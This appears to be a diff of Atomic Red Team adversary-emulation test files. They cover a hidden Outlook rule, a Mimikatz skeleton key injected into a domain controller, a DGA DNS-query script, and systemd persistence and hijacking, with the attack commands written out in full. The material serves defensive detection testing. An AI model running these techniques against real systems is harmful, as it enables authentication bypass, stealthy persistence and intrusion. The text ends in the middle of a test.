+      default: "atomic-rt-hidden"
+    sound_file_path:
+      description: Path to .wav file used as the rule action payload indicator
+      type: string
+      default: "C:\\Windows\\Media\\notify.wav"
+  dependencies:
+    - description: Classic Outlook must be installed (required for COM automation)
+      prereq_command: |
+        $clsid = (Get-ItemProperty "REGISTRY::HKEY_CLASSES_ROOT\Outlook.Application\CLSID" -ErrorAction SilentlyContinue).'(Default)'
+        if ($clsid) { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Classic Outlook is not installed or COM is not registered."
+        Write-Host "    Install Microsoft 365 Apps with Classic Outlook before running this test."
+        Write-Host "    Note: The new Outlook for Windows does NOT support COM automation."
+        exit 1
+    - description: Sound file must exist for PlaySound action
+      prereq_command: |
+        if (Test-Path "#{sound_file_path}") { exit 0 } else { exit 1 }
+      get_prereq_command: |
+        Write-Host "[-] Sound file not found at #{sound_file_path}"
+        Write-Host "    Specify a valid .wav file path in the sound_file_path input argument."
+        exit 1
+  executor:
+    name: powershell
+    elevation_required: false
+    command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] This test must be run from a non-elevated PowerShell session."
+          Write-Host "    Outlook COM fails with 0x80080005 when run as Administrator."
+          exit 1
+      }
+      $tmpScript = "$env:TEMP\T1137005_hidden_rule_create.ps1"
+      $lines = @(
+          '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+          '$outlook   = New-Object -ComObject Outlook.Application',
+          '$namespace = $outlook.GetNamespace("MAPI")',
+          '$rules     = $namespace.DefaultStore.GetRules()',
+          '$rule      = $rules.Create($hiddenName, 0)',
+          '$cond = $rule.Conditions.Subject',
+          '$cond.Enabled = $true',
+          '$cond.Text    = @("#{trigger_subject}")',
+          '$action          = $rule.Actions.PlaySound',
+          '$action.Enabled  = $true',
+          '$action.FilePath = "#{sound_file_path}"',
+          '$rule.Enabled = $true',
+          '$rules.Save()',
+          'Write-Host "[+] Hidden rule created with zero-width space name."',
+          'Write-Host "[*] Open Outlook via File -> Manage Rules and Alerts - rule name will appear blank."',
+          'Write-Host "[*] Verify rule exists via PowerShell COM enumeration (Test 4) or Get-InboxRule in Exchange."'
+      )
+      $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+      powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+      Remove-Item $tmpScript -ErrorAction SilentlyContinue
+    cleanup_command: |
+      $isAdmin = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]"Administrator")
+      if ($isAdmin) {
+          Write-Host "[-] Cleanup must be run from a non-elevated PowerShell session. Skipping."
+          exit 1
+      }
+      $tmpScript = "$env:TEMP\T1137005_hidden_rule_cleanup.ps1"
+      $lines = @(
+          '$hiddenName = [System.Text.Encoding]::Unicode.GetString([byte[]](0x0B, 0x20))',
+          '$outlook    = New-Object -ComObject Outlook.Application',
+          '$namespace  = $outlook.GetNamespace("MAPI")',
+          '$rules      = $namespace.DefaultStore.GetRules()',
+          '$removed    = $false',
+          'for ($i = $rules.Count; $i -ge 1; $i--) {',
+          '    if ($rules.Item($i).Name -eq $hiddenName) {',
+          '        $rules.Remove($rules.Item($i).Name)',
+          '        $removed = $true',
+          '    }',
+          '}',
+          'if ($removed) {',
+          '    $rules.Save()',
+          '    Write-Host "[+] Hidden rule(s) removed."',
+          '} else {',
+          '    Write-Host "[-] Hidden rule not found - may have already been removed."',
+          '}'
+      )
+      $lines -join "`n" | Set-Content -Path $tmpScript -Encoding UTF8
+      powershell.exe -NoProfile -ExecutionPolicy Bypass -File $tmpScript
+      Remove-Item $tmpScript -ErrorAction SilentlyContinue

atomics/T1556.001/T1556.001.md

@@ -0,0 +1,66 @@
+# T1556.001 - Modify Authentication Process: Domain Controller Authentication
+
+## Description from ATT&CK
+
+> Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.
+> 
+> Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://attack.mitre.org/software/S0007)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.(Citation: Dell Skeleton)
+
+[Source](https://attack.mitre.org/techniques/T1556/001)
+
+## Atomic Tests
+
+- [Atomic Test #1: Skeleton Key via Mimikatz](#atomic-test-1-skeleton-key-via-mimikatz)
+
+### Atomic Test #1: Skeleton Key via Mimikatz
+
+Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+This test must be run on an isolated domain controller and must not be performed on a production DC.
+Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+
+**Supported Platforms:** Windows
+
+**auto_generated_guid:** `0ee8081f-e9a7-4a2e-a23f-68473023184f`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| mimikatz_path | Path to the mimikatz executable | path | C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe|
+| file_path | File path where the zipped mimikatz file is downloaded to | path | C:\ExternalPayloads\Mimikatz\mimikatz.zip|
+| mimikatz_url | The URL for the mimikatz release zip | url | https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip|
+| directory_path | Directory path for mimikatz | path | C:\ExternalPayloads\Mimikatz|
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+```powershell
+& "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+```
+
+#### Cleanup Commands
+
+```powershell
+Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+Restart-Computer -Force
+```
+
+#### Dependencies: Run with `powershell`!
+
+##### Description: Mimikatz must be present on the host machine at
+
+###### Check Prereq Commands
+
+```powershell
+if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+```
+
+###### Get Prereq Commands
+
+```powershell
+New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+```
+

atomics/T1556.001/T1556.001.yaml

@@ -0,0 +1,47 @@
+attack_technique: T1556.001
+display_name: 'Modify Authentication Process: Domain Controller Authentication'
+atomic_tests:
+- name: Skeleton Key via Mimikatz
+  auto_generated_guid: 0ee8081f-e9a7-4a2e-a23f-68473023184f
+  description: |
+    Injects a Skeleton Key into LSASS on a domain controller using Mimikatz. Once injected, any domain
+    user account can be authenticated using the password 'mimikatz' until the domain controller is rebooted.
+
+    This test must be run on an isolated domain controller and must not be performed on a production DC.
+    Cleanup forces a reboot of the domain controller to evict the skeleton key from LSASS memory.
+  supported_platforms:
+    - windows
+  input_arguments:
+    mimikatz_path:
+      type: path
+      default: C:\ExternalPayloads\Mimikatz\x64\mimikatz.exe
+      description: Path to the mimikatz executable
+    file_path:
+      type: path
+      default: C:\ExternalPayloads\Mimikatz\mimikatz.zip
+      description: File path where the zipped mimikatz file is downloaded to
+    mimikatz_url:
+      type: url
+      default: https://github.com/gentilkiwi/mimikatz/releases/latest/download/mimikatz_trunk.zip
+      description: The URL for the mimikatz release zip
+    directory_path:
+      type: path
+      default: C:\ExternalPayloads\Mimikatz
+      description: Directory path for mimikatz
+  dependency_executor_name: powershell
+  dependencies:
+    - description: Mimikatz must be present on the host machine at #{mimikatz_path}
+      prereq_command: |
+        if (Test-Path "#{mimikatz_path}") {exit 0} else {exit 1}
+      get_prereq_command: |
+        New-Item -Type Directory "#{directory_path}" -ErrorAction Ignore -Force | Out-Null
+        Invoke-WebRequest -Uri "#{mimikatz_url}" -OutFile "#{file_path}"
+        Expand-Archive -LiteralPath "#{file_path}" -DestinationPath "#{directory_path}" -Force
+  executor:
+    command: |
+      & "#{mimikatz_path}" "privilege::debug" "misc::skeleton" "exit"
+    cleanup_command: |
+      Remove-Item -Path "#{directory_path}" -Recurse -ErrorAction Ignore
+      Restart-Computer -Force
+    name: powershell
+    elevation_required: true

atomics/T1568.002/T1568.002.md

@@ -0,0 +1,69 @@
+# T1568.002 - Dynamic Resolution: Domain Generation Algorithms
+
+## Description from ATT&CK
+
+> Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+> 
+> DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+> 
+> Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+
+[Source](https://attack.mitre.org/techniques/T1568/002)
+
+## Atomic Tests
+
+- [Atomic Test #1: DGA Simulation (Python)](#atomic-test-1-dga-simulation-python)
+
+### Atomic Test #1: DGA Simulation (Python)
+
+Simulates Domain Generation Algorithm (DGA) traffic by generating pseudo-random domains based on the current date and querying them using dig. 
+This is designed to trigger DNS analytics and NGIDS.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `cc367493-3a00-4c4a-a685-16b73339167c`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| python_script_path | Full path to the DGA python script | string | PathToAtomicsFolder/T1568.002/src/T1568.002.py|
+
+#### Attack Commands: Run with `bash`!
+
+```bash
+python3 "#{python_script_path}"
+```
+
+
+#### Dependencies: Run with `bash`!
+
+##### Description: #{python_script_path} must exist on system.
+
+###### Check Prereq Commands
+
+```bash
+if [ -f "#{python_script_path}" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```bash
+mkdir -p "$(dirname "#{python_script_path}")"
+curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
+```
+
+##### Description: Python 3 must be installed to run the script.
+
+###### Check Prereq Commands
+
+```bash
+which python3
+```
+
+###### Get Prereq Commands
+
+```bash
+sudo apt-get update && sudo apt-get install -y python3
+```
+

atomics/T1568.002/T1568.002.yaml

@@ -0,0 +1,35 @@
+attack_technique: T1568.002
+display_name: "Dynamic Resolution: Domain Generation Algorithms"
+atomic_tests:
+- name: DGA Simulation (Python)
+  auto_generated_guid: cc367493-3a00-4c4a-a685-16b73339167c
+  description: |
+    Simulates Domain Generation Algorithm (DGA) traffic by generating pseudo-random domains based on the current date and querying them using dig. 
+    This is designed to trigger DNS analytics and NGIDS.
+  supported_platforms:
+  - linux
+  input_arguments:
+    python_script_path:
+      description: Full path to the DGA python script
+      type: string
+      default: PathToAtomicsFolder/T1568.002/src/T1568.002.py
+  dependency_executor_name: bash
+  dependencies:
+  - description: |
+      #{python_script_path} must exist on system.
+    prereq_command: |
+      if [ -f "#{python_script_path}" ]; then exit 0; else exit 1; fi
+    get_prereq_command: |
+      mkdir -p "$(dirname "#{python_script_path}")"
+      curl -sL "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1568.002/src/T1568.002.py" -o "#{python_script_path}"
+  - description: |
+      Python 3 must be installed to run the script.
+    prereq_command: |
+      which python3
+    get_prereq_command: |
+      sudo apt-get update && sudo apt-get install -y python3
+  executor:
+    command: |
+      python3 "#{python_script_path}"
+    name: bash
+    elevation_required: false

atomics/T1568.002/src/T1568.002.py

@@ -0,0 +1,22 @@
+import datetime
+import random
+import string
+import subprocess
+import time
+
+TLDs = ['.com', '.net', '.org', '.ru', '.biz']
+
+def generate_domain(seed):
+  random.seed(seed)
+  length = random.randint(10, 15)
+  name = ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
+  return name + random.choice(TLDs)
+
+if __name__ == "__main__":
+  today = datetime.date.today().strftime('%Y%m%d')
+  print('[*] DGA cycle seed:', today)
+  for i in range(10):
+    domain = generate_domain(today + str(i))
+    print('[+] Querying:', domain)
+    subprocess.run(['dig', '+short', domain], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
+    time.sleep(2)

atomics/T1569.003/T1569.003.md

@@ -0,0 +1,735 @@
+# T1569.003 - System Services: Systemctl
+
+## Description from ATT&CK
+
+> Adversaries may abuse systemctl to execute commands or programs. Systemctl is the primary interface for systemd, the Linux init system and service manager. Typically invoked from a shell, Systemctl can also be integrated into scripts or applications.
+> 
+> Adversaries may use systemctl to execute commands or programs as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s. Common subcommands include: `systemctl start`, `systemctl stop`, `systemctl enable`, `systemctl disable`, and `systemctl status`.(Citation: Red Hat Systemctl 2022)
+
+[Source](https://attack.mitre.org/techniques/T1569/003)
+
+## Atomic Tests
+
+- [Atomic Test #1: Create and Enable a Malicious systemd Service Unit](#atomic-test-1-create-and-enable-a-malicious-systemd-service-unit)
+- [Atomic Test #2: Create systemd Service Unit from /tmp (Unusual Location)](#atomic-test-2-create-systemd-service-unit-from-tmp-unusual-location)
+- [Atomic Test #3: Create systemd Service Unit from /dev/shm (Unusual Location)](#atomic-test-3-create-systemd-service-unit-from-devshm-unusual-location)
+- [Atomic Test #4: Modify Existing systemd Service to Execute Malicious Command](#atomic-test-4-modify-existing-systemd-service-to-execute-malicious-command)
+- [Atomic Test #5: Execute Command via Transient systemd Service (systemd-run)](#atomic-test-5-execute-command-via-transient-systemd-service-systemd-run)
+- [Atomic Test #6: Enumerate All systemd Services Using systemctl](#atomic-test-6-enumerate-all-systemd-services-using-systemctl)
+- [Atomic Test #7: Enable systemd Service for Persistence with Auto-Restart](#atomic-test-7-enable-systemd-service-for-persistence-with-auto-restart)
+- [Atomic Test #8: Masquerade Malicious Service as Legitimate System Service](#atomic-test-8-masquerade-malicious-service-as-legitimate-system-service)
+
+### Atomic Test #1: Create and Enable a Malicious systemd Service Unit
+
+Creates a new systemd service unit file in /etc/systemd/system/ and enables it using
+systemctl enable followed by systemctl start. Adversaries commonly abuse this workflow
+to establish persistence or execute arbitrary commands under the context of systemd.
+
+This simulates the full attacker workflow: writing the unit file, reloading the systemd
+daemon, enabling the service to survive reboots, and starting it immediately. This is
+consistent with techniques observed in ransomware precursor activity and post-exploitation
+frameworks targeting Linux infrastructure.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `e58c8723-5503-4533-b642-535cd20ec648`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | Name of the malicious service to create | string | atomic-test|
+| command_to_run | Command the service will execute | string | /bin/bash -c "echo atomictest > /tmp/atomic_service_output.txt"|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+echo "Description=Atomic Test Service" >> /etc/systemd/system/#{service_name}.service
+echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+echo "" >> /etc/systemd/system/#{service_name}.service
+echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+echo "ExecStart=#{command_to_run}" >> /etc/systemd/system/#{service_name}.service
+echo "Restart=on-failure" >> /etc/systemd/system/#{service_name}.service
+echo "" >> /etc/systemd/system/#{service_name}.service
+echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+systemctl daemon-reload
+systemctl enable #{service_name}.service
+systemctl start #{service_name}.service
+systemctl status #{service_name}.service
+```
+
+#### Cleanup Commands
+
+```sh
+systemctl stop #{service_name}.service 2>/dev/null || true
+systemctl disable #{service_name}.service 2>/dev/null || true
+rm -f /etc/systemd/system/#{service_name}.service
+systemctl daemon-reload
+rm -f /tmp/atomic_service_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+##### Description: /etc/systemd/system/ directory must exist and be writable
+
+###### Check Prereq Commands
+
+```sh
+if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "/etc/systemd/system/ does not exist or is not writable. Ensure systemd is installed."
+```
+
+### Atomic Test #2: Create systemd Service Unit from /tmp (Unusual Location)
+
+Creates a systemd service unit file in /tmp and loads it using systemctl start with
+an absolute path. Adversaries may write service unit files to world-writable directories
+such as /tmp to avoid triggering alerts on new file creation in standard service
+directories, or to execute payloads transiently without permanently installing a service.
+
+Loading a service unit from an arbitrary path rather than a standard systemd directory
+is unusual behaviour that should be detectable by monitoring systemctl command arguments.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `a1fa406e-2354-4a24-b6d6-94157e7564d4`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_path | Full path to the service file to be written in /tmp | path | /tmp/atomic_tmp.service|
+| command_to_run | Command the service will execute | string | /bin/bash -c "id > /tmp/atomic_tmp_output.txt"|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo "[Unit]" > #{service_path}
+echo "Description=Atomic Tmp Service" >> #{service_path}
+echo "" >> #{service_path}
+echo "[Service]" >> #{service_path}
+echo "ExecStart=#{command_to_run}" >> #{service_path}
+echo "" >> #{service_path}
+echo "[Install]" >> #{service_path}
+echo "WantedBy=multi-user.target" >> #{service_path}
+systemctl link #{service_path}
+systemctl start $(basename #{service_path})
+systemctl status $(basename #{service_path})
+```
+
+#### Cleanup Commands
+
+```sh
+systemctl stop $(basename #{service_path}) 2>/dev/null || true
+rm -f #{service_path}
+rm -f /tmp/atomic_tmp_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+##### Description: /tmp must exist and be writable
+
+###### Check Prereq Commands
+
+```sh
+if [ -d "/tmp" ] && [ -w "/tmp" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "/tmp does not exist or is not writable on this system."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+### Atomic Test #3: Create systemd Service Unit from /dev/shm (Unusual Location)
+
+Creates a systemd service unit file in /dev/shm and loads it using systemctl.
+/dev/shm is a memory-backed filesystem that is world-writable on most Linux systems
+and does not persist across reboots, making it particularly attractive to adversaries
+seeking to execute transient payloads while evading file-based forensic detection.
+
+This technique has been observed in post-exploitation scenarios where attackers
+deliberately avoid writing to disk-backed locations to limit forensic artefacts.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `dce49381-a26b-4d95-bdfa-c607ffe8bee5`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_path | Full path to the service file to be written in /dev/shm | path | /dev/shm/atomic_shm.service|
+| command_to_run | Command the service will execute | string | /bin/bash -c "whoami > /tmp/atomic_shm_output.txt"|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo "[Unit]" > #{service_path}
+echo "Description=Atomic SHM Service" >> #{service_path}
+echo "" >> #{service_path}
+echo "[Service]" >> #{service_path}
+echo "ExecStart=#{command_to_run}" >> #{service_path}
+echo "" >> #{service_path}
+echo "[Install]" >> #{service_path}
+echo "WantedBy=multi-user.target" >> #{service_path}
+systemctl link #{service_path}
+systemctl start $(basename #{service_path})
+systemctl status $(basename #{service_path})
+```
+
+#### Cleanup Commands
+
+```sh
+systemctl stop $(basename #{service_path}) 2>/dev/null || true
+rm -f #{service_path}
+rm -f /tmp/atomic_shm_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+##### Description: /dev/shm must exist and be writable
+
+###### Check Prereq Commands
+
+```sh
+if [ -d "/dev/shm" ] && [ -w "/dev/shm" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "/dev/shm does not exist or is not writable on this system."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+### Atomic Test #4: Modify Existing systemd Service to Execute Malicious Command
+
+Creates a service unit file that initially runs a benign command, then modifies the
+ExecStart directive using sed to substitute a malicious command before reloading and
+restarting the service. Adversaries may hijack existing services to blend in with normal
+service activity and avoid triggering detections focused solely on new service creation.
+
+This technique reflects the tradecraft observed in more sophisticated intrusions where
+blending into existing process trees is a priority over creating net-new services.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `6123928f-6389-4914-8d25-a5d69bd657fa`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | Name of the service to create and then modify for the test | string | atomic-modify-test|
+| malicious_command | Malicious command to substitute into ExecStart | string | /bin/bash -c "echo hijacked > /tmp/atomic_hijack_output.txt"|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+echo "Description=Legitimate Looking Service" >> /etc/systemd/system/#{service_name}.service
+echo "" >> /etc/systemd/system/#{service_name}.service
+echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+echo "ExecStart=/bin/true" >> /etc/systemd/system/#{service_name}.service
+echo "" >> /etc/systemd/system/#{service_name}.service
+echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+systemctl daemon-reload
+sed -i 's|ExecStart=.*|ExecStart=#{malicious_command}|' /etc/systemd/system/#{service_name}.service
+systemctl daemon-reload
+systemctl start #{service_name}.service
+systemctl status #{service_name}.service
+```
+
+#### Cleanup Commands
+
+```sh
+systemctl stop #{service_name}.service 2>/dev/null || true
+systemctl disable #{service_name}.service 2>/dev/null || true
+rm -f /etc/systemd/system/#{service_name}.service
+systemctl daemon-reload
+rm -f /tmp/atomic_hijack_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+##### Description: sed must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v sed)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+apt-get install -y sed 2>/dev/null || yum install -y sed 2>/dev/null || echo "Could not install sed automatically."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+##### Description: /etc/systemd/system/ directory must exist and be writable
+
+###### Check Prereq Commands
+
+```sh
+if [ -d "/etc/systemd/system" ] && [ -w "/etc/systemd/system" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "/etc/systemd/system/ does not exist or is not writable."
+```
+
+### Atomic Test #5: Execute Command via Transient systemd Service (systemd-run)
+
+Uses systemd-run to execute a command as a transient systemd service without creating
+a persistent unit file on disk. Adversaries may use systemd-run to execute arbitrary
+commands under the context of systemd while bypassing controls that monitor for new
+unit file creation, since transient services exist only in memory for their lifetime.
+
+This is a particularly stealthy technique as it leaves minimal on-disk artefacts and
+the service disappears from systemctl list-units once execution completes.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `a73a886f-23c5-4e8f-b1ab-b1bbc1f5e236`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| unit_name | Name of the transient systemd unit to create | string | atomic-transient|
+| command_to_run | Command to execute as a transient service | string | /bin/bash -c "id > /tmp/atomic_transient_output.txt"|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+systemd-run --unit=#{unit_name} --wait #{command_to_run}
+systemctl status #{unit_name}.service 2>/dev/null || echo "Transient service has already completed and exited."
+```
+
+#### Cleanup Commands
+
+```sh
+systemctl stop #{unit_name}.service 2>/dev/null || true
+rm -f /tmp/atomic_transient_output.txt
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemd-run must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemd-run is not available. Ensure systemd is installed and up to date."
+```
+
+##### Description: The test must be run as root or with sudo privileges
+
+###### Check Prereq Commands
+
+```sh
+if [ "$(id -u)" -eq 0 ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "This test requires root privileges. Run as root or use sudo."
+```
+
+### Atomic Test #6: Enumerate All systemd Services Using systemctl
+
+Enumerates all systemd services and their current states using systemctl list-units
+and systemctl list-unit-files. Adversaries may enumerate running and enabled services
+to identify targets for hijacking, understand the host environment, map installed
+security tooling, or identify gaps in monitoring coverage.
+
+Service enumeration is a common reconnaissance step during post-exploitation and may
+precede service hijacking or masquerading activity. This test does not require
+elevation as service listing is available to unprivileged users on most Linux systems.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `1e5be8d4-605a-4acb-8709-2f80b2d8ea95`
+
+#### Attack Commands: Run with `sh`!
+
+```sh
+systemctl list-units --type=service --all
+systemctl list-unit-files --type=service
+```
+
+#### Cleanup Commands
+
+```sh
+echo "No cleanup required"
+```
+
+#### Dependencies: Run with `sh`!
+
+##### Description: systemctl must be available on the system
+
+###### Check Prereq Commands
+
+```sh
+if [ -x "$(command -v systemctl)" ]; then exit 0; else exit 1; fi
+```
+
+###### Get Prereq Commands
+
+```sh
+echo "systemctl is not available. Ensure systemd is running on this system."
+```
+
+### Atomic Test #7: Enable systemd Service for Persistence with Auto-Restart
+
+Creates a payload script and a systemd service unit that executes it, then enables
+the service to survive reboots using systemctl enable. The service is configured with
+Restart=always to automatically restart on failure, mimicking the persistence mechanism
+used by adversaries deploying backdoors or beacons on Linux hosts.
+
+This technique is consistent with observed post-exploitation tradecraft where adversaries
+establish a foothold that survives reboots and self-heals after interruption, complicating
+incident response and remediation efforts.
+
+**Supported Platforms:** Linux
+
+**auto_generated_guid:** `2fc6c0ab-4f88-4eb8-ab1b-f739fc22bba7`
+
+#### Inputs
+
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| service_name | Name of the persistence service to create | string | atomic-persist|
+| payload_path | Path to the payload script that the service will execute | path | /tmp/atomic_payload.sh|
+
+#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin)
+
+```sh
+echo "[Unit]" > /etc/systemd/system/#{service_name}.service
+echo "Description=Atomic Persistence Service" >> /etc/systemd/system/#{service_name}.service
+echo "After=network.target" >> /etc/systemd/system/#{service_name}.service
+echo "" >> /etc/systemd/system/#{service_name}.service
+echo "[Service]" >> /etc/systemd/system/#{service_name}.service
+echo "ExecStart=#{payload_path}" >> /etc/systemd/system/#{service_name}.service
+echo "Restart=always" >> /etc/systemd/system/#{service_name}.service
+echo "RestartSec=10" >> /etc/systemd/system/#{service_name}.service
+echo "" >> /etc/systemd/system/#{service_name}.service
+echo "[Install]" >> /etc/systemd/system/#{service_name}.service
+echo "WantedBy=multi-user.target" >> /etc/systemd/system/#{service_name}.service
+systemctl daemon-reload
+systemctl enable #{service_name}.service
+systemctl start #{service_name}.service
+systemctl status #{service_name}.service
+```
+
+#### Cleanup Commands
